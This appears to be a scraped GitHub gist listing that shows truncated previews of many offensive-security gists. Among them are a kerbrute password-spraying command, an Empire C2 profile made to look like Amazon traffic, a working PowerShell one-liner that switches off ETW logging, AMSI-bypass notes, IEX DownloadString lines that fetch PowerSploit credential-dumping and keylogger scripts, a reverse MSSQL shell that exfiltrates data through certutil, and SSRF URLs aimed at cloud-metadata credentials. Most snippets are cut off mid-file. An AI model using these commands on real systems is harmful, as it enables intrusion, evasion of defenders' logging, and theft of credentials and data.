With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m; | |
| server { | |
| root /var/www/attacker-site.com/html; | |
| index index.html; | |
| server_name attacker-site.com www.attacker-site.com; | |
| location / { | |
| try_files $uri $uri/ =404; | |
| } | |
| location = /bypassamsiandrequeststager.txt { |
CalfCrusher
/ custom_amazon_empire_malleable.profile
Last active
December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Modified Amazon browsing traffic profile | |
| # | |
| set sleeptime "10000"; # Increased sleep time to 10 seconds | |
| set jitter "500"; # Increased jitter to 500 milliseconds | |
| set maxdns "255"; | |
| set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent | |
| http-get { |
CalfCrusher
/ SimulateInternetZoneTest.ps1
Created
November 7, 2023 00:18
— forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -OutputAssembly hello.exe -TypeDefinition @' | |
| using System; | |
| public class Hello { | |
| public static void Main(string[] Args) { | |
| System.Console.WriteLine("Hello, world!"); | |
| System.Console.Read(); | |
| } | |
| } | |
| '@ |
CalfCrusher
/ kerberos_attacks_cheatsheet.md
Created
October 15, 2023 10:57
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
CalfCrusher
/ KillETW.ps1
Created
October 7, 2023 15:52
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
CalfCrusher
/ amsi-bypass.md
Created
October 7, 2023 15:07
— forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)
To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
The first and worst way to bypass AMSI is downgrading powershell version to 2.0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Function to XOR a string with a key | |
| xor_string() { | |
| local string=$1 | |
| local key=$2 | |
| local result="" | |
| for ((i = 0; i < ${#string}; i++)); do | |
| local char=${string:i:1} |
CalfCrusher
/ In-memory PS injection.txt
Created
May 30, 2023 17:53
— forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1') | |
| #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1') | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') |
CalfCrusher
/ mandros.py
Created
May 19, 2023 15:03
— forked from xassiz/mandros.py
Reverse MSSQL shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
CalfCrusher
/ cloud_metadata.txt
Created
May 11, 2023 16:15
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
NewerOlder